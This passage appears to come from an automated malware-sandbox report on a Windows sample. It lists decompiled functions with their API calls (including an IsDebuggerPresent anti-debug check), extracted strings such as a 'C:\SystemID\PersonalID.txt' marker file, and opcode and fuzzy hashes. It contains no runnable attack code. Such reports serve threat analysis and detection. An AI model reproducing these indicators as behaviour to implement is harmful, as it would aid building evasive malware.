                                                                                        • Part of subcall function 0041BA80: CreateWindowExW.USER32 ref: 0041BAAD
                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                                                                                      • TranslateMessage.USER32(?), ref: 0041B4CD
                                                                                      • DispatchMessageW.USER32 ref: 0041B4D7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                      • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                      • API String ID: 441990211-897913220
                                                                                      • Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                                                                      • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                                                                                      • Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                                                                      • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004516A0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .\crypto\err\err.c$unknown
                                                                                      • API String ID: 0-565200744
                                                                                      • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                      • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                                                                                      • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                      • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00424168, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 0042419D
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: DebuggerPresent_memset
                                                                                      • String ID: i;B
                                                                                      • API String ID: 2328436684-472376889
                                                                                      • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                      • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                                                                                      • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                      • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0042A77E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                                                                                      • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                      • String ID: 8Q
                                                                                      • API String ID: 3761405300-2096853525
                                                                                      • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                      • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                                                                                      • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                      • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040C919, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _fputws$CreateDirectory
                                                                                      • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                      • API String ID: 2590308727-54166481
                                                                                      • Opcode ID: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                                                                                      • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                                                                                      • Opcode Fuzzy Hash: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                                                                                      • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00420DB3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __calloc_crt
                                                                                      • String ID: Assertion failed: %s, file %s, line %d
                                                                                      • API String ID: 3494438863-969893948
                                                                                      • Opcode ID: 1dd0bcc786bd9354787a1f3cd336883f869f594dd0932d9161717ffb1dcc9abd
                                                                                      • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                                                                                      • Opcode Fuzzy Hash: 1dd0bcc786bd9354787a1f3cd336883f869f594dd0932d9161717ffb1dcc9abd
                                                                                      • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00480620, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 00480686
                                                                                        • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                                                                      Strings
                                                                                      • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                                                                      • .\crypto\evp\digest.c, xrefs: 00480638
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset_raise
                                                                                      • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                      • API String ID: 1484197835-3867593797
                                                                                      • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                      • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                                                                                      • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                      • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0044F23E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0044F251
                                                                                        • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F266
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                      • String ID: TeM
                                                                                      • API String ID: 757275642-2215902641
                                                                                      • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                      • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                                                                                      • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                      • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%